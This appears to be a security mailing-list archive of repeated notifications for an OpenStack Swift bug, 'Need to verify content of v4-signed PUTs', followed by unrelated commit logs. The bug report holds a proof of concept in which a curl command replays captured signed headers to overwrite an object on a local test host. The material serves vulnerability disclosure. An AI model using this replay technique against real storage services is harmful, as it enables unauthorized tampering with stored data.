'"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... 
* TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From fungi at yuggoth.org Wed Mar 27 21:28:17 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 27 Mar 2019 21:28:17 -0000 Subject: [Openstack-security] [Bug 1765834] Re: Need to verify content of v4-signed PUTs References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155372209849.19401.16618732633314131000.launchpad@chaenomeles.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' 
> bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 
's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 
Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... 
DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z 
x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... 
* TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From 1765834 at bugs.launchpad.net Thu Mar 28 21:12:53 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 28 Mar 2019 21:12:53 -0000 Subject: [Openstack-security] [Bug 1765834] Re: Need to verify content of v4-signed PUTs References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155380757311.17795.6712589125243405944.malone@gac.canonical.com> Reviewed: https://review.openstack.org/648245 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=6afc1130fd753306d64745c9bee7712182b273d3 Submitter: Zuul Branch: feature/losf commit 89e5927f7dd94fc28b3847944eb7dd227d516fa8 Author: Thiago da Silva Date: Tue Mar 26 10:46:02 2019 -0400 Fix mocking time When running on Centos the side_effect was returning a MagicMock object instead of the intended int. Change-Id: I73713a9a96dc415073a637d85a40304021f76072 commit 50715acb1838fbde628e447e7b02545ce8469180 Author: OpenStack Release Bot Date: Mon Mar 25 17:07:54 2019 +0000 Update master for stable/stein Add file to the reno documentation build to show release notes for stable/stein. Use pbr instruction to increment the minor version number automatically so that master versions are higher than the versions on stable/stein. Change-Id: I6109bff3227f87d914abf7bd1d76143aaf91419d Sem-Ver: feature commit 179fa7ccd4d6faeacc989715887b69f9422a17b2 Author: John Dickinson Date: Mon Mar 18 17:09:31 2019 -0700 authors/changelog update for 2.21.0 release Change-Id: Iac51a69c71491e5a8db435aae396178a6c592c73 commit 64eec5fc93eb670e581cbb3a6dedb6a7aa501e99 Author: Tim Burke Date: Thu Mar 7 14:36:02 2019 -0800 Fix how we UTF-8-ify func tests I noticed while poking at the DLO func tests that we don't actually use non-ascii chars when we set up the test env. By patching the create name function earlier (in SetUpClass) we can ensure we get some more interesting characters in our object names. 
Change-Id: I9480ddf74463310aeb11ad876b79527888d8c871 commit fe3a20f2e4b745bf7d81f9bda97082b593e8794a Author: Tim Burke Date: Tue Mar 19 14:52:19 2019 -0700 Remove uncalled function Change-Id: Ica67815f0ddf4b00bce1ffe183735490c7f7c0b5 Related-Change: I5629de9f2e9b2331ed3f455d253efc69d030df72 commit adc568c97f5b30d9d4628eaf448f81d736ad4e51 Author: John Dickinson Date: Fri Mar 15 15:18:36 2019 -0700 Fix bulk responses when using xml and Expect 100-continue When we fixed bulk response heartbeating in https://review.openstack.org/#/c/510715/, code review raised the issue of moving the xml header down to after the early-exit clauses. At the time, it didn't seem to break anything, so it was left in place. However, that insight was correct. The purpose of the earlier patch was to force eventlet to use chunked transfer encoding on the response in order to prevent eventlet from buffering the whole response, thus defeating the purpose of the heartbeat responses. Moving the first line of the body lower (ie after the early exit checks), allows other headers in a chunked transfer encoding response to be appropriately processed before sending the headers. Sending the xml declaration early causes it to get intermingled in the 100-continue protocol, thus breaking the chunked transfer encoding semantics. Closes-Bug: #1819252 Change-Id: I072f4dab21cd7cdb81b9e41072eb504131411dc8 commit 585bf40cc0d8d88849dcf11d409e8c5a2a202a8d Author: Clay Gerrard Date: Mon Feb 18 20:05:46 2019 -0600 Simplify empty suffix handling We really only need to have one way to cleanup empty suffix dirs, and that's normally during suffix hashing which only happens when invalid suffixes get rehashed. When we iterate a suffix tree using yield hashes, we may discover an expired or otherwise reapable hashdir - when this happens we will now simply invalidate the suffix so that the next rehash can clean it up. This simplification removes an mis-behavior in the handling between the normal suffix rehashing cleanup and what was implemented in ssync. Change-Id: I5629de9f2e9b2331ed3f455d253efc69d030df72 Related-Change-Id: I2849a757519a30684646f3a6f4467c21e9281707 Closes-Bug: 1816501 commit e5eb673ccb5d3517107d28f6ce0672b066f53964 Author: Tim Burke Date: Fri Mar 1 14:00:35 2019 -0800 Stop monkey-patching mimetools You could *try* doing something similar to what we were doing there over in email.message for py3, but you would end up breaking pkg_resources (and therefor entrypoints) in the process. Drive-by: have mem_diskfile implement more of the diskfile API. Change-Id: I1ece4b4500ce37408799ee634ed6d7832fb7b721 commit d6af42b6b6d54713f09c3e1e983435bf2c3fa07d Author: Tim Burke Date: Tue Feb 19 13:53:07 2019 -0800 Clean up how we walk through ranges in ECAppIter Besides being easier to reason about, this also lets us run more unit tests under py37 which complains about a a generator raising StopIteration Change-Id: Ia6b945afef51bcc8ed20a7069fc60d5b8f9c9c0b commit c9773bfd2664f7090f590d288d9010d13851ea92 Author: Tim Burke Date: Wed Mar 13 16:20:00 2019 -0700 Add non-voting py37 unit test job Change-Id: I83f8f59023eabc97386481c18ed8bbf8fab64fa8 commit 95da1d97b11b43d04d20b98838ddc0c4f20cb6be Author: Tim Burke Date: Wed Mar 13 16:29:09 2019 -0700 Fix py35 unit test job Looks like some base templates got moved from xenial to bionic, which doesn't have py35. Explicitly say that this job needs xenial. 
